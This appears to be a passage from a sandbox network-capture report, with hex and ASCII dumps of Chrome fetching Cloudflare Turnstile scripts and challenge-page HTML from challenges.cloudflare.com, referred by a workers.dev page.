                                        2025-01-08 23:45:49 UTC1093INData Raw: 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 63
                                        Data Ascii: k}}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}a{color:#fff}a:hover{text-decoration:underline;color:#ee730a}}</style><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 c
                                        2025-01-08 23:45:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.1649724104.18.95.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:50 UTC604OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:50 UTC386INHTTP/1.1 302 Found
                                        Date: Wed, 08 Jan 2025 23:45:50 GMT
                                        Content-Length: 0
                                        Connection: close
                                        access-control-allow-origin: *
                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                        cross-origin-resource-policy: cross-origin
                                        location: /turnstile/v0/g/849bfe45bf45/api.js
                                        Server: cloudflare
                                        CF-RAY: 8ff01040bf8a72b7-EWR
                                        alt-svc: h3=":443"; ma=86400


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.1649725104.18.95.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:50 UTC588OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:50 UTC471INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:50 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 47521
                                        Connection: close
                                        accept-ranges: bytes
                                        last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 8ff010447bc77c99-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:50 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                        2025-01-08 23:45:50 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                        Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                        2025-01-08 23:45:50 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                        2025-01-08 23:45:50 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                        2025-01-08 23:45:50 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                        2025-01-08 23:45:50 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                        Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                        2025-01-08 23:45:50 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                        Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                        2025-01-08 23:45:50 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                        Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                        2025-01-08 23:45:50 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                        Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                        2025-01-08 23:45:50 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                        Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.1649728104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:51 UTC825OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/ HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: iframe
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:51 UTC1362INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 26700
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                        cross-origin-embedder-policy: require-corp
                                        cross-origin-opener-policy: same-origin
                                        cross-origin-resource-policy: cross-origin
                                        origin-agent-cluster: ?1
                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        referrer-policy: same-origin
                                        document-policy: js-profiling
                                        2025-01-08 23:45:51 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 30 31 30 34 38 66 62 36 64 34 33 36 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                        Data Ascii: Server: cloudflareCF-RAY: 8ff01048fb6d4364-EWRalt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:51 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                        2025-01-08 23:45:51 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                        2025-01-08 23:45:51 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                        2025-01-08 23:45:51 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
